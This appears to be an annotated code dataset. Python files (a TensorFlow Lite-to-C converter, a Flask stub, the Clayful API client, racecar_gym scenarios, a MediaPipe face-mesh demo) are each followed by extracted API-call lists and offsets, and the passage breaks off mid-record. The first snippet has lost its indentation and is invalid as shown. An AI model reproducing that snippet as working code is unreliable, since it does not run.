def find_tflite_files(input_dir):
for f in os.listdir(input_dir):
if os.path.splitext(f)[-1] == '.tflite':
with open(os.path.join(input_dir, f), 'rb') as fd:
data = fd.read()
filename = sanitize_filename(os.path.splitext(f)[0])
yield filename, data
def generate_c_array(buf):
arr = ''
for i, ch in enumerate(buf):
if (i % 12) == 0:
arr += '\n '
arr += '0x{:02x}, '.format(ch)
return arr.lstrip().rstrip(', ')
def opcode_parse_opcode(opcode):
if opcode.CustomCode() != None:
opcode_val = opcode.CustomCode()
else:
opcode_val = opcode.BuiltinCode()
if opcode_val in opcode_dict.keys():
opcode_func = opcode_dict[opcode_val]
opcode_entry = {opcode_val: opcode_func}
else:
print(f"tflite.py WARNING: An unknown operator with code value={opcode_val} has been discovered. It will not be automatic initialized.")
opcode_entry = {-1: "UndefinedOp"}
return opcode_entry
def opcode_parse_model(model):
opcodes = {}
for index in range(model.OperatorCodesLength()):
opcode = model.OperatorCodes(index)
opcodes.update(opcode_parse_opcode(opcode))
return opcodes
def generate_files(input_dir, output_dir):
tc = Template(template_model_c_single)
th = Template(template_model_h_single)
data_c = ''
data_h = ''
parameter_defines = ''
opcodes = {}
for model_name, buf in find_tflite_files(input_dir):
props = {
'model_name': model_name,
'data': generate_c_array(buf),
'data_len': len(buf),
}
data_c += tc.substitute(**props)
data_h += th.substitute(**props)
model = tflite.Model.Model.GetRootAsModel(buf)
opcodes.update(opcode_parse_model(model))
# Extract model parameters
try:
loaded_model_params = TfliteModelParameters.load_from_tflite_flatbuffer(buf)
except:
loaded_model_params = {}
if loaded_model_params:
param_define_t = Template(template_model_parameter_single)
default_define_t = Template(template_model_default_parameter_single)
parameter_defines += f'// Definitions generated from {model_name}.tflite\n'
default_model_defines = f'// Default model parameters\n'
for key, value in sorted(loaded_model_params.items()):
# Ensure valid C code:
if type(value) == str:
value = f'"{value}"'
elif type(value) == bool:
value = str(value).lower()
props = {
'model_name': model_name.upper(),
'config_key': key.replace('.', '_').upper(),
'config_val': value,
}
parameter_defines += param_define_t.substitute(**props)
default_model_defines += default_define_t.substitute(**props)
parameter_defines += '\n'
tc = Template(template_model_c)
with open(os.path.join(output_dir, 'sl_tflite_micro_model.c'), 'w') as fd:
fd.write(tc.substitute(data=data_c, model_name=model_name, data_len=len(buf)))
th = Template(template_model_h)
with open(os.path.join(output_dir, 'sl_tflite_micro_model.h'), 'w') as fd:
fd.write(th.substitute(data=data_h))
tm = Template(template_opcode_resolver_h)
opcode_len = len(opcodes)
opcode_str = ''
# Only emit this file if model parameters are available
if parameter_defines:
tp = Template(template_model_parameters_h)
with open(os.path.join(output_dir, 'sl_tflite_micro_model_parameters.h'), 'w') as fd:
fd.write(tp.substitute(data=(parameter_defines + default_model_defines)))
for opcode_key in opcodes.keys():
if opcode_key != 32: # CUSTOM opcode
opcode_str += f"opcode_resolver.{opcodes[opcode_key]}(); \\\n"
with open(os.path.join(output_dir, 'sl_tflite_micro_opcode_resolver.h'), 'w') as fd:
fd.write(tm.substitute({'data_len':str(opcode_len), 'data':opcode_str}))
def entry():
parser = argparse.ArgumentParser(description='TensorFlow Lite flatbuffer to C converter.')
parser.add_argument('-i', required=True, help='Input directory containing .tflite files')
parser.add_argument('-o', required=True, help='Output directory to populate with serialized content.')
args = parser.parse_args()
generate_files(args.i, args.o)
entry() | [
"os.path.exists",
"tflite_model_parameters.TfliteModelParameters.load_from_tflite_flatbuffer",
"os.listdir",
"string.Template",
"sys.path.insert",
"argparse.ArgumentParser",
"sys.platform.startswith",
"os.path.join",
"os.path.splitext",
"os.path.dirname",
"re.sub"
] | [((153, 183), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win"""'], {}), "('win')\n", (176, 183), False, 'import sys\n'), ((431, 465), 'os.path.exists', 'os.path.exists', (['site_packages_path'], {}), '(site_packages_path)\n', (445, 465), False, 'import os\n'), ((4618, 4651), 're.sub', 're.sub', (['"""[^a-zA-Z0-9_]"""', '""""""', 'name'], {}), "('[^a-zA-Z0-9_]', '', name)\n", (4624, 4651), False, 'import re\n'), ((4791, 4812), 'os.listdir', 'os.listdir', (['input_dir'], {}), '(input_dir)\n', (4801, 4812), False, 'import os\n'), ((5954, 5987), 'string.Template', 'Template', (['template_model_c_single'], {}), '(template_model_c_single)\n', (5962, 5987), False, 'from string import Template\n'), ((5995, 6028), 'string.Template', 'Template', (['template_model_h_single'], {}), '(template_model_h_single)\n', (6003, 6028), False, 'from string import Template\n'), ((7479, 7505), 'string.Template', 'Template', (['template_model_c'], {}), '(template_model_c)\n', (7487, 7505), False, 'from string import Template\n'), ((7674, 7700), 'string.Template', 'Template', (['template_model_h'], {}), '(template_model_h)\n', (7682, 7700), False, 'from string import Template\n'), ((7827, 7863), 'string.Template', 'Template', (['template_opcode_resolver_h'], {}), '(template_opcode_resolver_h)\n', (7835, 7863), False, 'from string import Template\n'), ((8552, 8638), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""TensorFlow Lite flatbuffer to C converter."""'}), "(description=\n 'TensorFlow Lite flatbuffer to C converter.')\n", (8575, 8638), False, 'import argparse\n'), ((512, 550), 'sys.path.insert', 'sys.path.insert', (['(0)', 'site_packages_path'], {}), '(0, site_packages_path)\n', (527, 550), False, 'import sys\n'), ((8002, 8039), 'string.Template', 'Template', (['template_model_parameters_h'], {}), '(template_model_parameters_h)\n', (8010, 8039), False, 'from string import Template\n'), ((237, 269), 'os.path.dirname', 'os.path.dirname', (['jinja2.__file__'], {}), '(jinja2.__file__)\n', (252, 269), False, 'import os\n'), ((360, 392), 'os.path.dirname', 'os.path.dirname', (['jinja2.__file__'], {}), '(jinja2.__file__)\n', (375, 392), False, 'import os\n'), ((6509, 6563), 'tflite_model_parameters.TfliteModelParameters.load_from_tflite_flatbuffer', 'TfliteModelParameters.load_from_tflite_flatbuffer', (['buf'], {}), '(buf)\n', (6558, 6563), False, 'from tflite_model_parameters import TfliteModelParameters\n'), ((6658, 6699), 'string.Template', 'Template', (['template_model_parameter_single'], {}), '(template_model_parameter_single)\n', (6666, 6699), False, 'from string import Template\n'), ((6725, 6774), 'string.Template', 'Template', (['template_model_default_parameter_single'], {}), '(template_model_default_parameter_single)\n', (6733, 6774), False, 'from string import Template\n'), ((7518, 7569), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_model.c"""'], {}), "(output_dir, 'sl_tflite_micro_model.c')\n", (7530, 7569), False, 'import os\n'), ((7713, 7764), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_model.h"""'], {}), "(output_dir, 'sl_tflite_micro_model.h')\n", (7725, 7764), False, 'import os\n'), ((8375, 8436), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_opcode_resolver.h"""'], {}), "(output_dir, 'sl_tflite_micro_opcode_resolver.h')\n", (8387, 8436), False, 'import os\n'), ((4821, 4840), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (4837, 4840), False, 'import os\n'), ((8054, 8116), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_model_parameters.h"""'], {}), "(output_dir, 'sl_tflite_micro_model_parameters.h')\n", (8066, 8116), False, 'import os\n'), ((4875, 4901), 'os.path.join', 'os.path.join', (['input_dir', 'f'], {}), '(input_dir, f)\n', (4887, 4901), False, 'import os\n'), ((4976, 4995), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (4992, 4995), False, 'import os\n')] |
from flask import Flask
app = Flask(__name__,static_folder='../static') | [
"flask.Flask"
] | [((31, 73), 'flask.Flask', 'Flask', (['__name__'], {'static_folder': '"""../static"""'}), "(__name__, static_folder='../static')\n", (36, 73), False, 'from flask import Flask\n')] |
import re
import urllib
import numbers
from clayful.models import register_models
from clayful.requester import request
from clayful.exception import ClayfulException
class Clayful:
base_url = 'https://api.clayful.io'
default_headers = {
'Accept-Encoding': 'gzip',
'User-Agent': 'clayful-python',
'Clayful-SDK': 'clayful-python'
}
plugins = {
'request': request
}
listeners = {
'request': [],
'response': []
}
@staticmethod
def options_to_headers(o = {}):
headers = {}
if 'language' in o:
headers['Accept-Language'] = o['language']
if 'currency' in o:
headers['Accept-Currency'] = o['currency']
if 'time_zone' in o:
headers['Accept-Time-Zone'] = o['time_zone']
if 'client' in o:
headers['Authorization'] = 'Bearer ' + o['client']
if 'customer' in o:
headers['Authorization-Customer'] = o['customer']
if 'reCAPTCHA' in o:
headers['reCAPTCHA-Response'] = o['reCAPTCHA'];
if 'debug_language' in o:
headers['Accept-Debug-Language'] = o['debug_language']
if 'headers' in o:
headers.update(o['headers'])
return headers
@staticmethod
def get_endpoint(path):
return Clayful.base_url + path
@staticmethod
def normalize_query_values(query = {}):
copied = query.copy()
for key in copied:
if isinstance(copied[key], bool):
copied[key] = 'true' if copied[key] == True else 'false'
if isinstance(copied[key], numbers.Number):
copied[key] = str(copied[key])
return copied
@staticmethod
def extract_request_arguments(options):
result = {
'http_method': options['http_method'],
'request_url': options['path'],
'payload': None,
'query': {},
'headers': {},
'meta': {}
}
rest = options['args'][len(options['params']):]
for i, key in enumerate(options['params']):
result['request_url'] = result['request_url'].replace('{' + key + '}', str(options['args'][i]))
if (options['http_method'] == 'POST' or options['http_method'] == 'PUT') and (options.get('without_payload', False) == False):
result['payload'] = (rest[0:1] or (None,))[0]
rest = rest[1:]
query_headers = (rest[0:1] or ({},))[0]
result['query'] = Clayful.normalize_query_values(query_headers.get('query', {}))
result['headers'] = Clayful.options_to_headers(query_headers)
result['meta'] = query_headers.get('meta', {})
return result
@staticmethod
def call_api(options):
extracted = Clayful.extract_request_arguments(options)
extracted.update({
'request_url': Clayful.get_endpoint(extracted['request_url']),
'model_name': options['model_name'],
'method_name': options['method_name'],
'uses_form_data': options.get('uses_form_data', False),
'error': None,
'response': None,
})
default_headers = Clayful.default_headers.copy()
# Extend default headers with header options
default_headers.update(extracted['headers'])
extracted['headers'] = default_headers
Clayful.trigger('request', extracted)
try:
response = Clayful.plugins['request'](extracted)
extracted['response'] = response
Clayful.trigger('response', extracted)
return response
except ClayfulException as e:
extracted['error'] = e
Clayful.trigger('response', extracted)
raise
@staticmethod
def config(options = {}):
headers = Clayful.options_to_headers(options)
Clayful.default_headers.update(headers)
@staticmethod
def install(scope, plugin):
if scope in Clayful.plugins:
Clayful.plugins[scope] = plugin
@staticmethod
def on(event_name, callback):
listeners = Clayful.listeners.get(event_name, None)
if listeners is None:
return
listeners.append(callback)
@staticmethod
def off(event_name, callback):
listeners = Clayful.listeners.get(event_name, None)
if (listeners is None) or (not callback in listeners):
return
listeners.remove(callback)
@staticmethod
def trigger(event_name, data):
listeners = Clayful.listeners.get(event_name, None)
if listeners is None:
return
for listener in listeners:
listener(data)
@staticmethod
def format_image_url(base_url, options = {}):
query = []
normalized = Clayful.normalize_query_values(options)
for key in normalized:
query.append(key + '=' + normalized.get(key, ''))
query = '&'.join(query)
if bool(query):
query = '?' + query
return base_url + query
@staticmethod
def format_number(number, currency = {}):
if not isinstance(number, numbers.Number):
return ''
precision = currency.get('precision', None)
delimiter = currency.get('delimiter', {})
thousands = delimiter.get('thousands', '')
decimal = delimiter.get('decimal', '.')
if isinstance(precision, numbers.Number):
n = 10 ** precision
number = round(number * n) / n
# To deal with 0.0 case..
if precision == 0:
number = int(number)
parts = str(number).split('.')
a = thousands.join(re.findall('.{1,3}', parts[0][::-1]))[::-1]
b = parts[1] if len(parts) > 1 else ''
if isinstance(precision, numbers.Number):
diff = precision - len(b)
diff = 0 if diff < 0 else diff
b += '0' * diff
decimal = decimal if bool(b) else ''
return decimal.join([a, b])
@staticmethod
def format_price(number, currency = {}):
formatted_number = Clayful.format_number(number, currency)
if not bool(formatted_number):
return ''
symbol = currency.get('symbol', '')
format = currency.get('format', '{price}')
return format.replace('{symbol}', symbol).replace('{price}', formatted_number)
# Register models
register_models(Clayful) | [
"re.findall",
"clayful.models.register_models"
] | [((5574, 5598), 'clayful.models.register_models', 'register_models', (['Clayful'], {}), '(Clayful)\n', (5589, 5598), False, 'from clayful.models import register_models\n'), ((4934, 4970), 're.findall', 're.findall', (['""".{1,3}"""', 'parts[0][::-1]'], {}), "('.{1,3}', parts[0][::-1])\n", (4944, 4970), False, 'import re\n')] |
from dataclasses import dataclass
from typing import Dict
from racecar_gym.bullet import load_world, load_vehicle
from racecar_gym.tasks import Task, get_task
from racecar_gym.core import World, Agent
from .specs import ScenarioSpec, TaskSpec
def task_from_spec(spec: TaskSpec) -> Task:
task = get_task(spec.task_name)
return task(**spec.params)
@dataclass
class MultiAgentScenario:
world: World
agents: Dict[str, Agent]
@staticmethod
def from_spec(path: str, rendering: bool = None) -> 'MultiAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agents = dict([
(s.id, Agent(id=s.id, vehicle=load_vehicle(s.vehicle), task=task_from_spec(s.task)))
for s in spec.agents
])
return MultiAgentScenario(world=load_world(spec.world, agents=list(agents.values())), agents=agents)
@dataclass
class SingleAgentScenario:
world: World
agent: Agent
@staticmethod
def from_spec(path: str, rendering: bool = None) -> 'SingleAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agent_spec = spec.agents[0]
agent = Agent(id=agent_spec.id, vehicle=load_vehicle(agent_spec.vehicle), task=task_from_spec(agent_spec.task))
return SingleAgentScenario(world=load_world(spec.world, agents=[agent]), agent=agent)
| [
"racecar_gym.tasks.get_task",
"racecar_gym.bullet.load_world",
"racecar_gym.bullet.load_vehicle"
] | [((300, 324), 'racecar_gym.tasks.get_task', 'get_task', (['spec.task_name'], {}), '(spec.task_name)\n', (308, 324), False, 'from racecar_gym.tasks import Task, get_task\n'), ((1311, 1343), 'racecar_gym.bullet.load_vehicle', 'load_vehicle', (['agent_spec.vehicle'], {}), '(agent_spec.vehicle)\n', (1323, 1343), False, 'from racecar_gym.bullet import load_world, load_vehicle\n'), ((1425, 1463), 'racecar_gym.bullet.load_world', 'load_world', (['spec.world'], {'agents': '[agent]'}), '(spec.world, agents=[agent])\n', (1435, 1463), False, 'from racecar_gym.bullet import load_world, load_vehicle\n'), ((725, 748), 'racecar_gym.bullet.load_vehicle', 'load_vehicle', (['s.vehicle'], {}), '(s.vehicle)\n', (737, 748), False, 'from racecar_gym.bullet import load_world, load_vehicle\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import copy
import argparse
import cv2 as cv
import numpy as np
import mediapipe as mp
from utils import CvFpsCalc
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--device", type=int, default=0)
parser.add_argument("--width", help='cap width', type=int, default=960)
parser.add_argument("--height", help='cap height', type=int, default=540)
parser.add_argument("--max_num_faces", type=int, default=1)
parser.add_argument("--min_detection_confidence",
help='min_detection_confidence',
type=float,
default=0.7)
parser.add_argument("--min_tracking_confidence",
help='min_tracking_confidence',
type=int,
default=0.5)
parser.add_argument('--use_brect', action='store_true')
args = parser.parse_args()
return args
def main():
# 引数解析 #################################################################
args = get_args()
cap_device = args.device
cap_width = args.width
cap_height = args.height
max_num_faces = args.max_num_faces
min_detection_confidence = args.min_detection_confidence
min_tracking_confidence = args.min_tracking_confidence
use_brect = args.use_brect
# カメラ準備 ###############################################################
cap = cv.VideoCapture(cap_device)
cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width)
cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height)
# モデルロード #############################################################
mp_face_mesh = mp.solutions.face_mesh
face_mesh = mp_face_mesh.FaceMesh(
max_num_faces=max_num_faces,
min_detection_confidence=min_detection_confidence,
min_tracking_confidence=min_tracking_confidence,
)
# FPS計測モジュール ########################################################
cvFpsCalc = CvFpsCalc(buffer_len=10)
while True:
display_fps = cvFpsCalc.get()
# カメラキャプチャ #####################################################
ret, image = cap.read()
if not ret:
break
image = cv.flip(image, 1) # ミラー表示
debug_image = copy.deepcopy(image)
# 検出実施 #############################################################
image = cv.cvtColor(image, cv.COLOR_BGR2RGB)
results = face_mesh.process(image)
# 描画 ################################################################
if results.multi_face_landmarks is not None:
for face_landmarks in results.multi_face_landmarks:
# 外接矩形の計算
brect = calc_bounding_rect(debug_image, face_landmarks)
# 描画
debug_image = draw_landmarks(debug_image, face_landmarks)
debug_image = draw_bounding_rect(use_brect, debug_image, brect)
cv.putText(debug_image, "FPS:" + str(display_fps), (10, 30),
cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv.LINE_AA)
# キー処理(ESC:終了) #################################################
key = cv.waitKey(1)
if key == 27: # ESC
break
# 画面反映 #############################################################
cv.imshow('MediaPipe Face Mesh Demo', debug_image)
cap.release()
cv.destroyAllWindows()
def calc_bounding_rect(image, landmarks):
image_width, image_height = image.shape[1], image.shape[0]
landmark_array = np.empty((0, 2), int)
for _, landmark in enumerate(landmarks.landmark):
landmark_x = min(int(landmark.x * image_width), image_width - 1)
landmark_y = min(int(landmark.y * image_height), image_height - 1)
landmark_point = [np.array((landmark_x, landmark_y))]
landmark_array = np.append(landmark_array, landmark_point, axis=0)
x, y, w, h = cv.boundingRect(landmark_array)
return [x, y, x + w, y + h]
def draw_landmarks(image, landmarks):
image_width, image_height = image.shape[1], image.shape[0]
landmark_point = []
for index, landmark in enumerate(landmarks.landmark):
if landmark.visibility < 0 or landmark.presence < 0:
continue
landmark_x = min(int(landmark.x * image_width), image_width - 1)
landmark_y = min(int(landmark.y * image_height), image_height - 1)
landmark_point.append((landmark_x, landmark_y))
cv.circle(image, (landmark_x, landmark_y), 1, (0, 255, 0), 1)
if len(landmark_point) > 0:
# 参考:https://github.com/tensorflow/tfjs-models/blob/master/facemesh/mesh_map.jpg
# 左眉毛(55:内側、46:外側)
cv.line(image, landmark_point[55], landmark_point[65], (0, 255, 0), 2)
cv.line(image, landmark_point[65], landmark_point[52], (0, 255, 0), 2)
cv.line(image, landmark_point[52], landmark_point[53], (0, 255, 0), 2)
cv.line(image, landmark_point[53], landmark_point[46], (0, 255, 0), 2)
# 右眉毛(285:内側、276:外側)
cv.line(image, landmark_point[285], landmark_point[295], (0, 255, 0),
2)
cv.line(image, landmark_point[295], landmark_point[282], (0, 255, 0),
2)
cv.line(image, landmark_point[282], landmark_point[283], (0, 255, 0),
2)
cv.line(image, landmark_point[283], landmark_point[276], (0, 255, 0),
2)
# 左目 (133:目頭、246:目尻)
cv.line(image, landmark_point[133], landmark_point[173], (0, 255, 0),
2)
cv.line(image, landmark_point[173], landmark_point[157], (0, 255, 0),
2)
cv.line(image, landmark_point[157], landmark_point[158], (0, 255, 0),
2)
cv.line(image, landmark_point[158], landmark_point[159], (0, 255, 0),
2)
cv.line(image, landmark_point[159], landmark_point[160], (0, 255, 0),
2)
cv.line(image, landmark_point[160], landmark_point[161], (0, 255, 0),
2)
cv.line(image, landmark_point[161], landmark_point[246], (0, 255, 0),
2)
cv.line(image, landmark_point[246], landmark_point[163], (0, 255, 0),
2)
cv.line(image, landmark_point[163], landmark_point[144], (0, 255, 0),
2)
cv.line(image, landmark_point[144], landmark_point[145], (0, 255, 0),
2)
cv.line(image, landmark_point[145], landmark_point[153], (0, 255, 0),
2)
cv.line(image, landmark_point[153], landmark_point[154], (0, 255, 0),
2)
cv.line(image, landmark_point[154], landmark_point[155], (0, 255, 0),
2)
cv.line(image, landmark_point[155], landmark_point[133], (0, 255, 0),
2)
# 右目 (362:目頭、466:目尻)
cv.line(image, landmark_point[362], landmark_point[398], (0, 255, 0),
2)
cv.line(image, landmark_point[398], landmark_point[384], (0, 255, 0),
2)
cv.line(image, landmark_point[384], landmark_point[385], (0, 255, 0),
2)
cv.line(image, landmark_point[385], landmark_point[386], (0, 255, 0),
2)
cv.line(image, landmark_point[386], landmark_point[387], (0, 255, 0),
2)
cv.line(image, landmark_point[387], landmark_point[388], (0, 255, 0),
2)
cv.line(image, landmark_point[388], landmark_point[466], (0, 255, 0),
2)
cv.line(image, landmark_point[466], landmark_point[390], (0, 255, 0),
2)
cv.line(image, landmark_point[390], landmark_point[373], (0, 255, 0),
2)
cv.line(image, landmark_point[373], landmark_point[374], (0, 255, 0),
2)
cv.line(image, landmark_point[374], landmark_point[380], (0, 255, 0),
2)
cv.line(image, landmark_point[380], landmark_point[381], (0, 255, 0),
2)
cv.line(image, landmark_point[381], landmark_point[382], (0, 255, 0),
2)
cv.line(image, landmark_point[382], landmark_point[362], (0, 255, 0),
2)
# 口 (308:右端、78:左端)
cv.line(image, landmark_point[308], landmark_point[415], (0, 255, 0),
2)
cv.line(image, landmark_point[415], landmark_point[310], (0, 255, 0),
2)
cv.line(image, landmark_point[310], landmark_point[311], (0, 255, 0),
2)
cv.line(image, landmark_point[311], landmark_point[312], (0, 255, 0),
2)
cv.line(image, landmark_point[312], landmark_point[13], (0, 255, 0), 2)
cv.line(image, landmark_point[13], landmark_point[82], (0, 255, 0), 2)
cv.line(image, landmark_point[82], landmark_point[81], (0, 255, 0), 2)
cv.line(image, landmark_point[81], landmark_point[80], (0, 255, 0), 2)
cv.line(image, landmark_point[80], landmark_point[191], (0, 255, 0), 2)
cv.line(image, landmark_point[191], landmark_point[78], (0, 255, 0), 2)
cv.line(image, landmark_point[78], landmark_point[95], (0, 255, 0), 2)
cv.line(image, landmark_point[95], landmark_point[88], (0, 255, 0), 2)
cv.line(image, landmark_point[88], landmark_point[178], (0, 255, 0), 2)
cv.line(image, landmark_point[178], landmark_point[87], (0, 255, 0), 2)
cv.line(image, landmark_point[87], landmark_point[14], (0, 255, 0), 2)
cv.line(image, landmark_point[14], landmark_point[317], (0, 255, 0), 2)
cv.line(image, landmark_point[317], landmark_point[402], (0, 255, 0),
2)
cv.line(image, landmark_point[402], landmark_point[318], (0, 255, 0),
2)
cv.line(image, landmark_point[318], landmark_point[324], (0, 255, 0),
2)
cv.line(image, landmark_point[324], landmark_point[308], (0, 255, 0),
2)
return image
def draw_bounding_rect(use_brect, image, brect):
if use_brect:
# 外接矩形
cv.rectangle(image, (brect[0], brect[1]), (brect[2], brect[3]),
(0, 255, 0), 2)
return image
if __name__ == '__main__':
main()
| [
"cv2.rectangle",
"cv2.flip",
"argparse.ArgumentParser",
"cv2.boundingRect",
"cv2.line",
"cv2.imshow",
"numpy.append",
"numpy.array",
"cv2.circle",
"numpy.empty",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"copy.deepcopy",
"cv2.cvtColor",
"cv2.waitKey",
"utils.CvFpsCalc"
] | [((194, 219), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (217, 219), False, 'import argparse\n'), ((1449, 1476), 'cv2.VideoCapture', 'cv.VideoCapture', (['cap_device'], {}), '(cap_device)\n', (1464, 1476), True, 'import cv2 as cv\n'), ((1982, 2006), 'utils.CvFpsCalc', 'CvFpsCalc', ([], {'buffer_len': '(10)'}), '(buffer_len=10)\n', (1991, 2006), False, 'from utils import CvFpsCalc\n'), ((3391, 3413), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (3411, 3413), True, 'import cv2 as cv\n'), ((3543, 3564), 'numpy.empty', 'np.empty', (['(0, 2)', 'int'], {}), '((0, 2), int)\n', (3551, 3564), True, 'import numpy as np\n'), ((3925, 3956), 'cv2.boundingRect', 'cv.boundingRect', (['landmark_array'], {}), '(landmark_array)\n', (3940, 3956), True, 'import cv2 as cv\n'), ((2222, 2239), 'cv2.flip', 'cv.flip', (['image', '(1)'], {}), '(image, 1)\n', (2229, 2239), True, 'import cv2 as cv\n'), ((2271, 2291), 'copy.deepcopy', 'copy.deepcopy', (['image'], {}), '(image)\n', (2284, 2291), False, 'import copy\n'), ((2386, 2422), 'cv2.cvtColor', 'cv.cvtColor', (['image', 'cv.COLOR_BGR2RGB'], {}), '(image, cv.COLOR_BGR2RGB)\n', (2397, 2422), True, 'import cv2 as cv\n'), ((3170, 3183), 'cv2.waitKey', 'cv.waitKey', (['(1)'], {}), '(1)\n', (3180, 3183), True, 'import cv2 as cv\n'), ((3317, 3367), 'cv2.imshow', 'cv.imshow', (['"""MediaPipe Face Mesh Demo"""', 'debug_image'], {}), "('MediaPipe Face Mesh Demo', debug_image)\n", (3326, 3367), True, 'import cv2 as cv\n'), ((3857, 3906), 'numpy.append', 'np.append', (['landmark_array', 'landmark_point'], {'axis': '(0)'}), '(landmark_array, landmark_point, axis=0)\n', (3866, 3906), True, 'import numpy as np\n'), ((4474, 4535), 'cv2.circle', 'cv.circle', (['image', '(landmark_x, landmark_y)', '(1)', '(0, 255, 0)', '(1)'], {}), '(image, (landmark_x, landmark_y), 1, (0, 255, 0), 1)\n', (4483, 4535), True, 'import cv2 as cv\n'), ((4694, 4764), 'cv2.line', 'cv.line', (['image', 'landmark_point[55]', 'landmark_point[65]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[55], landmark_point[65], (0, 255, 0), 2)\n', (4701, 4764), True, 'import cv2 as cv\n'), ((4773, 4843), 'cv2.line', 'cv.line', (['image', 'landmark_point[65]', 'landmark_point[52]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[65], landmark_point[52], (0, 255, 0), 2)\n', (4780, 4843), True, 'import cv2 as cv\n'), ((4852, 4922), 'cv2.line', 'cv.line', (['image', 'landmark_point[52]', 'landmark_point[53]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[52], landmark_point[53], (0, 255, 0), 2)\n', (4859, 4922), True, 'import cv2 as cv\n'), ((4931, 5001), 'cv2.line', 'cv.line', (['image', 'landmark_point[53]', 'landmark_point[46]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[53], landmark_point[46], (0, 255, 0), 2)\n', (4938, 5001), True, 'import cv2 as cv\n'), ((5040, 5112), 'cv2.line', 'cv.line', (['image', 'landmark_point[285]', 'landmark_point[295]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[285], landmark_point[295], (0, 255, 0), 2)\n', (5047, 5112), True, 'import cv2 as cv\n'), ((5137, 5209), 'cv2.line', 'cv.line', (['image', 'landmark_point[295]', 'landmark_point[282]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[295], landmark_point[282], (0, 255, 0), 2)\n', (5144, 5209), True, 'import cv2 as cv\n'), ((5234, 5306), 'cv2.line', 'cv.line', (['image', 'landmark_point[282]', 'landmark_point[283]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[282], landmark_point[283], (0, 255, 0), 2)\n', (5241, 5306), True, 'import cv2 as cv\n'), ((5331, 5403), 'cv2.line', 'cv.line', (['image', 'landmark_point[283]', 'landmark_point[276]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[283], landmark_point[276], (0, 255, 0), 2)\n', (5338, 5403), True, 'import cv2 as cv\n'), ((5458, 5530), 'cv2.line', 'cv.line', (['image', 'landmark_point[133]', 'landmark_point[173]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[133], landmark_point[173], (0, 255, 0), 2)\n', (5465, 5530), True, 'import cv2 as cv\n'), ((5555, 5627), 'cv2.line', 'cv.line', (['image', 'landmark_point[173]', 'landmark_point[157]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[173], landmark_point[157], (0, 255, 0), 2)\n', (5562, 5627), True, 'import cv2 as cv\n'), ((5652, 5724), 'cv2.line', 'cv.line', (['image', 'landmark_point[157]', 'landmark_point[158]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[157], landmark_point[158], (0, 255, 0), 2)\n', (5659, 5724), True, 'import cv2 as cv\n'), ((5749, 5821), 'cv2.line', 'cv.line', (['image', 'landmark_point[158]', 'landmark_point[159]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[158], landmark_point[159], (0, 255, 0), 2)\n', (5756, 5821), True, 'import cv2 as cv\n'), ((5846, 5918), 'cv2.line', 'cv.line', (['image', 'landmark_point[159]', 'landmark_point[160]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[159], landmark_point[160], (0, 255, 0), 2)\n', (5853, 5918), True, 'import cv2 as cv\n'), ((5943, 6015), 'cv2.line', 'cv.line', (['image', 'landmark_point[160]', 'landmark_point[161]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[160], landmark_point[161], (0, 255, 0), 2)\n', (5950, 6015), True, 'import cv2 as cv\n'), ((6040, 6112), 'cv2.line', 'cv.line', (['image', 'landmark_point[161]', 'landmark_point[246]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[161], landmark_point[246], (0, 255, 0), 2)\n', (6047, 6112), True, 'import cv2 as cv\n'), ((6138, 6210), 'cv2.line', 'cv.line', (['image', 'landmark_point[246]', 'landmark_point[163]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[246], landmark_point[163], (0, 255, 0), 2)\n', (6145, 6210), True, 'import cv2 as cv\n'), ((6235, 6307), 'cv2.line', 'cv.line', (['image', 'landmark_point[163]', 'landmark_point[144]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[163], landmark_point[144], (0, 255, 0), 2)\n', (6242, 6307), True, 'import cv2 as cv\n'), ((6332, 6404), 'cv2.line', 'cv.line', (['image', 'landmark_point[144]', 'landmark_point[145]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[144], landmark_point[145], (0, 255, 0), 2)\n', (6339, 6404), True, 'import cv2 as cv\n'), ((6429, 6501), 'cv2.line', 'cv.line', (['image', 'landmark_point[145]', 'landmark_point[153]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[145], landmark_point[153], (0, 255, 0), 2)\n', (6436, 6501), True, 'import cv2 as cv\n'), ((6526, 6598), 'cv2.line', 'cv.line', (['image', 'landmark_point[153]', 'landmark_point[154]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[153], landmark_point[154], (0, 255, 0), 2)\n', (6533, 6598), True, 'import cv2 as cv\n'), ((6623, 6695), 